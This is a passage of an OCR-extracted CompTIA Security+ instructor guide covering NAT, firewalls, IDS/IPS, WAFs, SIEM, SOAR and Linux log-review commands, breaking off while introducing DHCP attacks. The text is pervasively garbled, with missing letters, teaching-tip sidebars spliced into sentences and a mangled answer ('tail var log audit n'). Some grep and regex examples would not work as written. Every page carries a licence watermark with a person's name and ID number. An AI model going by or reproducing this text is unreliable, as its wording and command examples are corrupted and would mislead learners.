mapped onto a single public address. or e ample, say two hosts . . .
and . . . initiate a web connection at the same time. The NA T service
creates two new port mappings for these re uests . . . and
. . . . It then substitutes the private I s for the public I and
forwards the re uests to the public Internet. It performs a reverse mapping on any
traffic returned using those ports, inserting the original I address and port number,
and forwards the packets to the internal hosts.

AT overloading. (Image 1 .com.)

• Destination NAT/port forwarding uses the router's public address to publish

a web service, but forwards incoming re uests to a di erent I . ort forwarding
means that the router takes re uests from the Internet for a particular application
say, TT port and sends them to a designated host and port in the DM
or LAN.

esson 10 Implementing etwork Security Appliances | Topic 10A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 265

Configuring port forwarding on a pfSense firewall appliance This rule forwards any TTP
traffic received on the appliance s A interface to the 10.1.0.10 host on the A .
(Screenshot used with permission from pfsense.org.)

The larger IPv6 address space makes most use cases for AT redundant. A host can use a
link-local address to contact neighboring nodes, but any routed traffic should use a globally
uni ue address. In IPv6 it is routing policies and firewall filtering that manage which hosts
and networks are reachable. That said, there are mechanisms for translating prefixes at the
network edge ( PTv6) and for translation between IPv6 addresses ( AT66) or IPv6 and IPv
addresses ( AT6 and AT 6).

Virtual Firewalls Show Slide(s)

irtual firewalls are usually deployed within data centers and cloud services. A virtual irtual irewalls
firewall can be implemented in three di erent ways
• ypervisor based this means that filtering functionality is built into the hypervisor Teaching
or cloud provisioning tool. ou can use the cloud's web app or application Tip
programming interface A I to write access control lists ACLs for traffic arriving or Note that we will
leaving a virtual host or virtual network. cover cloud security in
more detail in another
• irtual appliance this refers to deploying a vendor firewall appliance instance using lesson.
virtuali ation, in the same way you might deploy a indows or Linu guest .

• Multiple conte t this refers to multiple virtual firewall instances running on a

hardware firewall appliance. ach conte t has a separate interface and can perform
a distinct filtering role.

hile they can be deployed like regular firewalls for one based routing and filtering,
virtual firewalls most significant role is to support the east west security and ero trust
microsegmentation design paradigms. They are able to inspect traffic as it passes from
host to host or between virtual networks, rather than re uiring that traffic be routed
up to a firewall appliance and back.

esson 10 Implementing etwork Security Appliances | Topic 10A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 266 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Open-Source versus Proprietary Firewalls

pen ource versus
The ability to inspect source code will be a re uirement for high security environments
Proprietary Firewalls that cannot rely on implicit trust when selecting vendors. The code underpinning
appliance based, software, and virtual firewalls can be developed as open source or
proprietary or somewhere in between
• holly proprietary implemented as a proprietary , such as Cisco A A, Juniper
Jun , aloAlto AN , or arracuda's indows based appliance.

• Mostly proprietary developed from a Linu kernel, but with proprietary features
added. amples include Check oint I , orti ate orti , and onicwall. Any
code developed from a L source should be available, but in general terms these
products cannot be used independently of a commercial contract with the vendor.

• holly open souce these can be used independently of the vendor, but the
vendors typically have commercial appliances and support contracts too. amples
include pfSense and Smoothwall.

In determining whether to follow a self installed versus supported deployment, as well

as the core appliance code, you need to consider access to support, update availability,
and access to subscription based features, such as signatures and threat feeds.

esson 10 Implementing etwork Security Appliances | Topic 10A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 267

e ie Acti ity
ire alls and roxy Ser ers
Answer the following uestions

1. True or False? As they protect data at the highest layer of the protocol
stac application ased fire alls ha e no asic pac et filterin
functionality.

alse. All firewall types can perform basic packet filtering by I address, protocol type,
port number, and so on .

2. hat distin uishes host ased personal so t are fire all rom a net or
fire all appliance

A personal firewall software can block processes from accessing a network connection
as well as applying filtering rules. A personal firewall protects the local host only, while
a network firewall filters traffic for all hosts on the segment behind the firewall.

3. True or alse hen deplo in a non transparent pro ou must confi ure
clients with the proxy address and port.

True.

4. hat is usuall the purpose o the de ault rule on a fire all

lock any traffic not specifically allowed implicit deny .

5. True or false? Static NAT means mapping a single public/external IP address

to a single private/internal IP address.

True.

esson 10 Implementing etwork Security Appliances | Topic 10A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 268 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 10B
Implement Network
Security onitoring

Teaching EXAM OBJECTIVES COVERED

Tip 3.3 Given a scenario, implement secure network designs
This topic looks at
basic ID solutions
and at TM or ne t
Intrusion detection and prevention systems are mature security technologies, widely
gen firewalls and
secure web gateways. deployed to monitor company networks. A large part of the monitoring and alerting
data you will be analy ing will come from these systems so it is important that you
Show Slide(s) be able to install them to appropriate locations in the network and configure them
correctly.
Network ased
Intrusion Detection
Systems
Network-Based Intrusion Detection Systems
An intrusion detection system (IDS) is a means of using software tools to provide
Teaching
real time analysis of either network traffic or system and application logs. A network-
Tip
based IDS (NIDS) captures traffic via a packet sni er, referred to as a sensor. It
IDS has mostly analy es the packets to identify malicious traffic and displays alerts to a console or
developed into IPS
dashboard.
and merged with
firewall and anti virus A NID , such as Snort (snort.org , uricata suricata ids.org , or eek ro zeek.org
antispyware software. performs passive detection. hen traffic is matched to a detection signature, it raises
The systems are not
as limited by network an alert or generates a log entry, but does not block the source host. This type of
and host bandwidth passive sensor does not slow down traffic and is undetectable by the attacker. It does
as they were a few not have an IP address on the monitored network segment.
years ago. From
the perspective of A NID is used to identify and log hosts and applications and to detect attack
the e am, however, signatures, password guessing attempts, port scans, worms, backdoor applications,
you should stress malformed packets or sessions, and policy violations (ports or IP addresses that are
the di erence. It is not permitted, for instance . ou can use analysis of the logs to tune firewall rulesets,
certainly important remove or block suspect hosts and processes from the network, or deploy additional
to realize that a pure
IDS will only provide a
security controls to mitigate any threats you identify.
passive response.

esson 10 Implementing etwork Security Appliances | Topic 10

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 269

iewing an intrusion detection alert generated by Snort in the ibana app on Security Onion.
(Screenshot Security Onion securityonion.net)

TAPs and Port Mirrors Show Slide(s)

Typically, the packet capture sensor is placed inside a firewall or close to a server of TA s and ort Mirrors
particular importance. The idea is usually to identify malicious traffic that has managed
to get past the firewall. A single ID can generate a very large amount of logging and Teaching
alerting data so you cannot ust put multiple sensors everywhere in the network Tip
without provisioning the resources to manage them properly. Depending on network Make sure students
si e and resources, one or ust a few sensors will be deployed to monitor key assets or can distinguish
network paths. between appropriate
locations for sensors
There are three main options for connecting a sensor to the appropriate point in the and the location of
network: the collection/analysis
engine.
• SPAN (switched port analyzer)/mirror port this means that the sensor is
attached to a specially configured port on the switch that receives copies of frames
addressed to nominated access ports or all the other ports . This method is not
completely reliable. rames with errors will not be mirrored and frames may be
dropped under heavy load.

• Passive test access point (TAP) this is a bo with ports for incoming and outgoing
network cabling and an inductor or optical splitter that physically copies the signal
from the cabling to a monitor port. There are types for copper and fiber optic
cabling. nlike a AN, no logic decisions are made so the monitor port receives
every frame corrupt or malformed or not and the copying is una ected by load.

• Active TA this is a powered device that performs signal regeneration again, there
are copper and fiber variants , which may be necessary in some circumstances.
igabit signaling over copper wire is too comple for a passive tap to monitor and
some types of fiber links may be adversely a ected by optical splitting. ecause it
performs an active function, the TA becomes a point of failure for the links in the
event of power loss. hen deploying an active TA , it is important to use a model
with internal batteries or connect it to a .

A TA will usually output two streams to monitor a full duple link one channel for
upstream and one for downstream . Alternatively, there are aggregation TA s, which

esson 10 Implementing etwork Security Appliances | Topic 10

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 270 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

rebuild the streams into a single channel, but these can drop frames under very
heavy load.

Show Slide(s) Network-Based Intrusion Prevention Systems

Compared to the passive function of an IDS, an intrusion prevention system (IPS) can
Network ased
provide an active response to any network threats that it matches. ne typical preventive
Intrusion Prevention
Systems measure is to end the TCP session, sending a TCP reset packet to the attacking host.
Another option is for the I to apply a temporary filter on the firewall to block the
Teaching attacker's I address shunning . ther advanced measures include throttling bandwidth
Tip to attacking hosts, applying comple firewall filters, and even modifying suspect packets
Make sure students to render them harmless. inally, the appliance may be able to run a script or third party
understand inline program to perform some other action not supported by the I software itself.
placement and active
response versus ome I provide inline, wire speed anti virus scanning. Their rulesets can be
passive detection, configured to provide user content filtering, such as blocking Ls, applying keyword
alerting, and logging of sensitive block lists or allow lists, or applying time based access restrictions.
threats.
I appliances are positioned like firewalls at the border between two network ones.
As with pro y servers, the appliances are inline with the network, meaning that all
traffic passes through them also making them a single point of failure if there is no
fault tolerance mechanism . This means that they need to be able to cope with high
bandwidths and process each packet very uickly to avoid slowing down the network.

Show Slide(s) Signature-Based Detection

In an ID , the analysis engine is the component that scans and interprets the traffic
ignature ased
captured by the sensor with the purpose of identifying suspicious traffic. The analysis
Detection
engine determines how any given event should be classed, with typical options to
Teaching ignore, log only, alert, and block I . The analysis engine is programmed with a set
Tip of rules that it uses to drive its decision making process. There are several methods of
While we don't go
formulating the ruleset.
into detail on Snort/ Signature-based detection or pattern matching means that the engine is loaded
Suricata rules, make
with a database of attack patterns or signatures. If traffic matches a pattern, then the
sure students can
identify the general engine generates an incident.
format.

Snort rules file supplied by the open-source Emerging Threats community feed.

esson 10 Implementing etwork Security Appliances | Topic 10

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 271

The signatures and rules often called plug ins or feeds powering intrusion detection
need to be updated regularly to provide protection against the latest threat types.
Commercial software re uires a paid for subscription to obtain the updates. It
is important to ensure that the software is configured to update only from valid
repositories, ideally using a secure connection method, such as TT .

eha ior and Anomal ased etection Show Slide(s)

Behavioral-based detection means that the engine is trained to recogni e baseline Behavior and
normal traffic or events. Anything that deviates from this baseline outside a defined Anomaly ased
level of tolerance generates an incident. The idea is that the software will be able to Detection
identify zero day attacks, insider threats, and other malicious activity for which there is
single signature. Teaching
Tip
istorically, this type of detection was provided by network behavior and anomaly
Make sure students
detection N AD products. An N AD engine uses heuristics (meaning to learn from understand the
e perience to generate a statistical model of what baseline normal traffic looks like. It may di erences between
develop several profiles to model network use at di erent times of the day. This means detection methods
that the system generates false positive and false negatives until it has had time to improve and false negatives
its statistical model of what is normal. A false positive is where legitimate behavior and false positives.
generates an alert, while a false negative is where malicious activity is not alerted.
hile N AD products were relatively unsophisticated, the use of machine learning
in more recent products has helped to make them more productive. As identified by
Gartner's market analysis (gartner.com en documents market guide for
user and entity behavior analytics , there are two general classes of behavior based
detection products that utilize machine learning:
• ser and entity behavior analytics A these products scan indicators from
multiple intrusion detection and log sources to identify anomalies. They are often
integrated with security information and event management I M platforms.

• Network traffic analysis NTA these products are closer to ID and N AD in

that they apply analysis techni ues only to network streams, rather than multiple
network and log data sources.

ften behavioral and anomaly based detection are taken to mean the same thing in
the sense that the engine detects anomalous behavior . Anomaly based detection can
also be taken to mean specifically looking for irregularities in the use of protocols. or
e ample, the engine may check packet headers or the e change of packets in a session
against RFC standards and generate an alert if they deviate from strict RFC compliance.

Next-Generation Firewalls and Content Filters Show Slide(s)

While intrusion detection was originally produced as standalone software or Ne t eneration

appliances, its functionality very uickly became incorporated into a new generation Firewalls and Content
of firewalls. The original ne t eneration fire all was released as far back Filters
as by alo Alto. This product combined application aware filtering with user
account based filtering and the ability to act as an intrusion prevention system I . Teaching
This approach was uickly adopted by competitor products. ubse uent firewall Tip
generations have added capabilities such as cloud inspection and combined features of Encourage students
di erent security technologies. to use both market
research and vendor
sites to navigate
nified Threat ana ement T the various product
classifications.
nified threat mana ement T refers to a security product that centralizes many
types of security controls firewall, anti malware, network intrusion prevention, spam
filtering, content filtering, data loss prevention, N, cloud access gateway into a
single appliance. This means that you can monitor and manage the controls from a

esson 10 Implementing etwork Security Appliances | Topic 10

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 272 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

single console. Nevertheless, TM has some downsides. hen defense is unified under
a single system, this creates the potential for a single point of failure that could a ect
an entire network. Distinct security systems, if they fail, might only compromise that
particular avenue of attack. Additionally, TM systems can struggle with latency issues
if they are sub ect to too much network activity. Also, a TM might not perform as well
as software or a device with a single dedicated security function.

To some extent, G and UT are ust marketing terms. A UT is seen as turnkey do

everything solution, while a G is an enterprise product with fewer features, or more
modularization, and greater configuration complexity, but better performance. It can be
more helpful to focus on the specific product features, rather than trying to present an
implementation decision as a choice of either a G or a UT .

Content/URL Filter
A firewall has to sustain high loads, and overloads can increase latency or even cause
outages. The high comple ity of application aware N and TM solutions can
reduce their suitability as an edge device, because while they might provide high
confidentiality and integrity, lower throughput reduces availability. ne solution to this
is to treat security solutions for server traffic di erently from that for user traffic. ser
traffic refers to web browsing, social networking, email, and video oI connections
initiated by local network clients.
Conse uently, where a stateful or N firewall may be deployed for application
server traffic, the ob of filtering user traffic is often performed by a separate appliance
or pro y host. A content filter is designed to apply a number of user focused filtering
rules, such as blocking uniform resource locators Ls that appear on content
blacklists or applying time based restrictions to browsing. Content filters are now
usually implemented as a class of product called a secure web gateway (SWG). As well
as filtering, a performs threat analysis and often integrates the functionality of
data loss prevention DL and cloud access security brokers CA to protect against
the full range of unauthorized egress threats, including malware command and control
and data e filtration.

Show Slide(s) Host-Based Intrusion Detection Systems

ost ased Intrusion
A host-based IDS (HIDS) captures information from a single host, such as a server,
Detection Systems router, or firewall. ome organi ations may configure ID on each client workstation.
ID come in many di erent forms with di erent capabilities. The core ability is
Teaching to capture and analy e log files, but more sophisticated systems can also monitor
Tip kernel files, monitor ports and network interfaces, and process data and logs
We're including FIM generated by specific applications, such as TT or T .
here as part of the
3.3 network design ID software produces similar output to an anti malware scanner. If the software
ob ective. Note that detects a threat, it may ust log the event or display an alert. The log should show you
we will cover endpoint which process initiated the event and what resources on the host were a ected. ou
protection suites in a can use the log to investigate whether the suspect process is authori ed or should be
di erent lesson.
removed from the host.
ne of the core features of ID is file inte rit monitorin I . This may also be
implemented as a standalone feature. When software is installed from a legitimate
source (using signed code in the case of Windows or a secure repository in the case of
Linu , the package manager checks the signature or fingerprint of each e ecutable
file and notifies the user if there is a problem. IM software audits key system files
to make sure they match the authorized versions. In Windows, the Windows File
rotection service runs automatically and the ystem ile Checker sfc tool can be used
manually to verify system files. Tripwire tripwire.com and C ossec.net are
e amples of multi platform tools with options to protect a wider range of applications.

esson 10 Implementing etwork Security Appliances | Topic 10

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 273

Web Application Firewalls Show Slide(s)

A e application fire all A is designed specifically to protect software running eb Application

on web servers and their backend databases from code in ection and Do attacks. Firewalls
A s use application aware processing rules to filter traffic and perform application
specific intrusion detection. The A can be programmed with signatures of known Teaching
attacks and use pattern matching to block re uests containing suspect code. The Tip
output from a A will be written to a log, which you can inspect to determine what e'll be turning to
threats the web application might be sub ect to. web application
security in more detail
later in the course. Just
make sure students
can distinguish the
function of a A
from more general
network host firewall
IDS types.

ith the odSecurity A installed to this IIS server, a scanning attempt has been detected and logged
as an Application event. As you can see, the default ruleset generates a lot of events.
(Screenshot used with permission from icrosoft.)

A A may be deployed as an appliance or as plug in software for a web server

platform. ome e amples of A products include
• ModSecurity (modsecurity.org is an open source sponsored by Trustwave A for
Apache, ngin , and II .

• NA I github.com nbs system na si is an open source module for the ngin web
server software.

• Imperva (imperva.com is a commercial web security o ering with a particular focus

on data centers. Imperva markets A , DDo , and database security through its
SecureSphere appliance.

esson 10 Implementing etwork Security Appliances | Topic 10

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 274 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

e ie Acti ity
et ork Security onitoring
Answer the following uestions

1. hat is the est option or monitorin tra c passin rom host to host on
the same switch?

The only option for monitoring intra switch traffic is to use a mirrored port.

2. What sort of maintenance must be performed on signature-based

monitoring software?

Installing definition signature updates and removing definitions that are not relevant to
the hosts or services running on your network.

3. What is the principal risk of deploying an intrusion prevention system with

behavior-based detection?

ehavior based detection can e hibit high false positive rates, where legitimate activity
is wrongly identified as malicious. ith automatic prevention, this will block many
legitimate users and hosts from the network, causing availability and support issues.

4. I a indo s s stem file ails a file inte rit chec should ou suspect a
malware infection?

es malware is a likely cause that you should investigate.

5. What is a WAF?

A web application firewall A is designed to protect TT and TT applications.

It can be configured with signatures of known attacks against applications, such as
in ection based attacks or scanning attacks.

esson 10 Implementing etwork Security Appliances | Topic 10

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 275

Topic 10C
Summari e the se o SIE

EXAM OBJECTIVES COVERED Teaching

1. Summarize the techni ues used in security assessments Tip
3.3 Given a scenario, implement secure network designs
I M can be a
.1 Given a scenario, use the appropriate tool to assess organizational security comple technology
to implement. Focus
There are many types of security controls that can be deployed to protect networks, on identifying the
hosts, and data. ne thing that all these controls have in common is that they components of a SIEM
system and sources of
generate log data and alerts. Reviewing this output is one of the principal challenges data.
in information security management. As a security professional, you must be able to
describe, install, and configure systems to manage logging and events.

Monitoring Services Show Slide(s)

ecurity assessments and incident response both re uire real time monitoring of host
Monitoring Services
and network status indicators plus audit information.
Teaching
Packet Capture Tip
Data captured from network sensors sni ers plus net ow sources provides both Give an overview of
the types of data that
summary statistics about bandwidth and protocol usage and the opportunity for
need to be collected,
detailed frame analysis. aggregated, and
analyzed.
Network Monitors
As distinct from network traffic monitoring, a network monitor collects data about
network appliances, such as switches, access points, routers, firewalls, and servers. This
is used to monitor load status for C memory, state tables, disk capacity, fan speeds
temperature, network link utili ation error statistics, and so on. Another important
function is a heartbeat message to indicate availability. This data might be collected
using the imple Network Management rotocol NM or a proprietary management
system. As well as supporting availability, network monitoring might reveal unusual
conditions that could point to some kind of attack.

Logs
Logs are one of the most valuable sources of security information. A system log can
be used to diagnose availability issues. A security log can record both authori ed and
unauthori ed uses of a resource or privilege. Logs function both as an audit trail of
actions and if monitored regularly provide a warning of intrusion attempts. Log review
is a critical part of security assurance. nly referring to the logs following a ma or
incident is missing the opportunity to identify threats and vulnerabilities early and to
respond proactively.

ogs typically associate an action with a particular user. This is one of the reasons that it
is critical that users not share logon details. If a user account is compromised, there is no
means of tying events in the log to the actual attacker.

esson 10 Implementing etwork Security Appliances | Topic 10C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 276 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Security Information and Event Management

Security Information
Software designed to assist with managing security data inputs and provide reporting
and Event and alerting is often described as security information and event management
Management (SIEM). The core function of an I M tool is to aggregate traffic data and logs. In
addition to logs from indows and Linu based hosts, this could include switches,
Teaching routers, firewalls, ID sensors, vulnerability scanners, malware scanners, data loss
Tip prevention DL systems, and databases.
Point out the
di erence between
sensor/collector
placement and
the location of the
correlation and
reporting server.

OSSI SIE dashboard Configurable dashboards provide the high-level status view of network
security metrics. (Screenshot used with permission from AT T Cybersecurity.)

o Collection
The first task for I M is to collect data inputs from multiple sources. There are three
main types of log collection:
• Agent based with this approach, you must install an agent service on each host. As
events occur on the host, logging data is filtered, aggregated, and normali ed at the
host, then sent to the SIEM server for analysis and storage.

• Listener/collector rather than installing an agent, hosts can be configured to

push updates to the I M server using a protocol such as syslog or NM . A process
runs on the management server to parse and normalize each log/monitoring
source.

Syslog (tools.ietf.org html rfc allows for centrali ed collection of events from
multiple sources. It also provides an open format for event logging messages, and
as such has become a de facto standard for logging of events from distributed
systems. or e ample, syslog messages can be generated by Cisco routers and
switches, as well as servers and workstations.

• ensor as well as log data, the I M might collect packet captures and traffic ow
data from sni ers.

esson 10 Implementing etwork Security Appliances | Topic 10C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 277

Enabling a log parser plug-in for a pfSense security appliance so that firewall events can be imported
into the SIE . (Screenshot used with permission from AT T Cybersecurity.)

o A re ation
As distinct from collection, aggregation refers to normali ing data from di erent
sources so that it is consistent and searchable. I M software features connectors
or plug ins to interpret or parse data from distinct types of systems and to account
for di erences between vendor implementations. sually parsing will be carried out
using regular e pressions tailored to each log file format to identify attributes and
content that can be mapped to standard fields in the I M's reporting and analysis
tools. Another important function is to normali e date time one di erences to a
single timeline.

Anal sis and eport e ie Show Slide(s)

Where collection and aggregation produce inputs, a SIEM is also used for reporting. Analysis and eport
A critical function of I M and the principal factor distinguishing it from basic log eview
management is that of correlation. This means that the I M software can link
individual events or data points observables into a meaningful indicator of risk, Teaching
or Indicator of Compromise I C . Correlation can then be used to drive an alerting Tip
system. These reports would be viewed from the I M dashboard. Note that we will
return to the use of
asic correlation can be performed using simple If Then type rules. owever, many I M and A in the
I M solutions use artificial intelligence AI and machine learning as the basis for lesson on incident
automated analysis. response. ere, e uip
students with a broad
User and Entity Behavior Analytics overview of product
capabilities.
A user and entity behavior analytics A solution supports identification of malicious
behaviors from comparison to a baseline. As the name suggests, the analytics software
tracks user account behavior across di erent devices and cloud services. ntity refers
to machine accounts, such as client workstations or virtualized server instances, and
to embedded hardware, such as Internet of Things IoT devices. The comple ity of

esson 10 Implementing etwork Security Appliances | Topic 10C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 278 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

determining baselines and reducing false positives means that A solutions are
heavily dependent on AI and machine learning. amples include Microsoft's Advanced
Threat Analytics docs.microsoft.com en us advanced threat analytics what is ata and
plunk A splunk.com en us software user behavior analytics.html .

Sentiment Analysis
ne of the biggest challenges for behavior analytics driven by machine learning is
to identify intent. It is e tremely difficult for a machine to establish the conte t and
interpretation of statements in natural language, though much progress is being made.
The general e orts in this area are referred to as sentiment analysis, or emotion
AI. The typical use case for sentiment analysis is to monitor social media for brand
incidents, such as a disgruntled customer announcing on Twitter what poor customer
service they have ust received. In terms of security, this can be used to gather threat
intelligence and try to identify e ternal or insider threats before they can develop as
attacks.

ecurit rchestration Automation and esponse

ecurity orchestration, automation, and response A is designed as a solution to
the problem of the volume of alerts overwhelming analysts' ability to respond. A A
may be implemented as a standalone technology or integrated with a I M often
referred to as a ne t gen I M. The basis of A is to scan the organi ation's store
of security and threat intelligence, analy e it using machine deep learning techni ues,
and then use that data to automate and provide data enrichment for the work ows
that drive incident response and threat hunting.

Show Slide(s) File Manipulation

File Manipulation
While SIEM can automate many functions of log collection and review, you may also
have to manually prepare data using a Linu command line.

The cat Command

The Linu command cat allows you to view the contents of one or more files. or
e ample, if you want to view the whole contents of two rotated log files, you could run
cat -n access.log access2.log
The -n switch adds line numbers. If you wanted to output to a new file rather than the
terminal, you can run:
cat -n access.log access2.log > access_cat.log

The head and tail Commands

The head and tail commands output the first and last lines respectively of a file you
provide. ou can also ad ust this default value to output more or fewer lines using the
n switch. or e ample, the following command shows the most recent entries in a
log file
tail /var/log/messages -n 20
The logger Command
The logger command writes input to the local system log or to a remote syslog server
(linu .die.net man logger . ou can use the command in a script to write any te t
string or use the f option to write the contents of another file. ou can also write the
output of commands by enclosing the command in backticks. The following command

esson 10 Implementing etwork Security Appliances | Topic 10C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 279

writes the name of the local machine along with the te t up to the syslog server at
. . .
logger -n 10.1.0.242 `hostname` up

Regular Expressions and grep Show Slide(s)

Filtering a log to discover data points of interest usually involves some sort of string egular pressions
search, typically invoking regular expression (regex) synta . A regular e pression is and grep
a search pattern to match within a given string. The search pattern is built from the
rege synta . This synta defines metacharacters that function as search operators,
uantifiers, logic statements, and anchors boundaries. The following list illustrates
some commonly used elements of rege synta
• [ … ] matches a single instance of a character within the brackets. This can
include literals, ranges such as [a-z], and token matches, such as [\s] (white
space or [\d] one digit .

• + matches one or more occurrences. A uantifier is placed after the term to match
for e ample, \s+ matches one or more white space characters.

• * matches zero or more times.

• ? matches once or not at all.
• {} matches a number of times. or e ample, {2} matches two times, {2,}
matches two or more times, and {2-5} matches two to five times.

A complete description of regex syntax is beyond the scope of this course, but you can use
an online reference such as regexr.com or rexegg.com to learn it.

The grep command invokes simple string matching or rege synta to search te t files
for specific strings. This enables you to search the entire contents of a te t file for a
specific pattern within each line and display that pattern on the screen or dump it to
another file. A simple e ample of grep usage is as follows:
grep -F 192.168.1.254 access.log
This searches the te t file access.log for all lines containing some variation of the literal
string pattern 192.168.1.254 and prints only those lines to the terminal. The -F
switch instructs grep to treat the pattern as a literal.
The following e ample searches for any I address in the . . . subnet using
rege synta for the pattern note that each period must be escaped within any file in
any directory from the current one. The -r option enables recursion, while the period
in the target part indicates the current directory:
grep -r 192\.168\.1\.[\d]{1,3}

esson 10 Implementing etwork Security Appliances | Topic 10C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 280 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

e ie Acti ity
se o SIE
Answer the following uestions

1. What is the purpose of SIEM?

ecurity information and event management I M products aggregate ID alerts and

host logs from multiple sources, then perform correlation analysis on the observables
collected to identify indicators of compromise and alert administrators to potential
incidents.

2. hat is the di erence et een a sensor and a collector in the conte t o

SIEM?

A I M collector parses input such as log files or packet traces into a standard format
that can be recorded within the I M and interpreted for event correlation. A sensor
collects data from the network media.

3. Does Syslog perform all the functions of a SIEM?

No, syslog allows remote hosts to send logs to a server, but syslog does not aggregate
normali e the log data or run correlation rules to identify alertable events.

4. ou are ritin a shell script to displa the last lines o a lo file at ar

log/audit in a dashboard. What is the Linux command to do this?

tail var log audit n

5. hat is the principal use o rep in relation to lo files

grep is used to search the content of files.

esson 10 Implementing etwork Security Appliances | Topic 10C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 281

Lesson 10
Summary
ou should be able to use network appliances such as firewalls, pro ies, ID , and I M Teaching
collectors/aggregators to implement secure network designs. Tip
Check that students
uidelines or Implementin et or ecurit Appliances are confident about
the content that has
Follow these guidelines when you deploy new or upgrade security appliances: been covered. If there
is time, re visit any
• Identify the security re uirements for a network one or area and determine the content e amples that
appropriate security technology to use: they have uestions
about. If you have
• Network firewall to apply an ACL to incoming and outgoing traffic. used all the available
time for this lesson
• ID , I , or ne t gen firewall to implement signature and or behavior based block, note the issues,
and schedule time for
threat detection.
a review later in the
course.
• Content filter to control outbound user access to sites and services.
Interaction
• UTM to implement multiple controls within a single appliance and reporting Opportunity
interface.
ptionally, discuss
• Assess whether endpoints within the one should be protected by additional with students how
security, such as host based firewalls, A s, or file integrity monitoring. comple security
functions can be
• valuate the commercial model and determine whether proprietary or open source implemented as
either separate
is the best fit for your re uirements. or consolidated
solutions. Check if
• Document and test the ACL or other security configuration when implementing the students have any
device to ensure that it meets the design goals. positive or negative
e perience of I M.
• Implement an appropriate method of log and network data collection and
aggregation to ensure monitoring and review of security events:

• Manual methods using syslog and file manipulation tools head, tail, cat, grep,
logger .

• ecurity information and event management I M products.

• ecurity orchestration, automation, and response A products.

esson 10 Implementing etwork Security Appliances

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 11
Implementing Secure
et ork rotocols

LESSON INTRODUCTION Teaching

Tip
hen hosts oin a network, they need to be configured with the appropriate settings Moving on from
for that network. The services that provide these settings, such as D C and DN , security appliances,
must be deployed securely. hen hosts access data using server applications, such this lesson looks
as web TT , email, and oI , the communications between clients and servers must at network service
be managed using secure versions of the application protocols. ou will also need to infrastructure
and security
configure secure protocols that allow users to access networks, host desktops, and
considerations,
appliance configuration interfaces remotely. including access
protocols such as
Lesson Objectives addressing D C ,
name resolution
DN , applications
In this lesson, you will web, file transfer,
• Implement secure network operations protocols. email, and oI ,
remote access/
• Implement secure application protocols. N, and remote
management.
• Implement secure remote access protocols.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 284 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 11A
Implement Secure Network
perations rotocols

Teaching EXAM OBJECTIVES COVERED

Tip 1.4 Given a scenario, analyze potential indicators associated with network attacks
hile they are all 3.1 Given a scenario, implement secure protocols
application layer
protocols in I
TC I model terms,
nsecure protocols can be e ploited by attackers to compromise data security and
this topic focuses systems integrity. In this topic, you will e amine some of the protocols and services
on protocols that providing addressing, name resolution, directory services, time synchroni ation, and
provide low level monitoring services for network hosts. These network operations protocols might
functionality. not be as visible as applications such as web and email servers, but they are critical to
As well as part of . , secure network infrastructure.
this topic covers DN
attacks from . .
et or Address Allocation
Show Slide(s)
Most networks use a mi ture of static and dynamic address allocation. Interface
addresses for routers, firewalls, and some types of servers are best assigned and
Network Address
Allocation
managed manually. ther server services and client workstations can be assigned
dynamic I configurations and accessed using name resolution.
Teaching The Dynamic ost Configuration rotocol D C provides an automatic method for
Tip network address allocation. The key point about D C is that only one server should
D C can be abused be o ering addresses to any one group of hosts. If a rogue D C server is set up, it can
to perform Do , perform Do as client machines will obtain an incorrect TC I configuration or be
snooping, or spoofing
used to snoop network information. D C starvation is a type of Do attack where a
attacks. D C isn't
specifically a content rogue client repeatedly re uests new I addresses using spoofed MAC addresses, with
e ample other the aim of e hausting the I address pool. This makes it more likely that clients seeking
than by reference an address lease will use the rogue D C server.
to network address
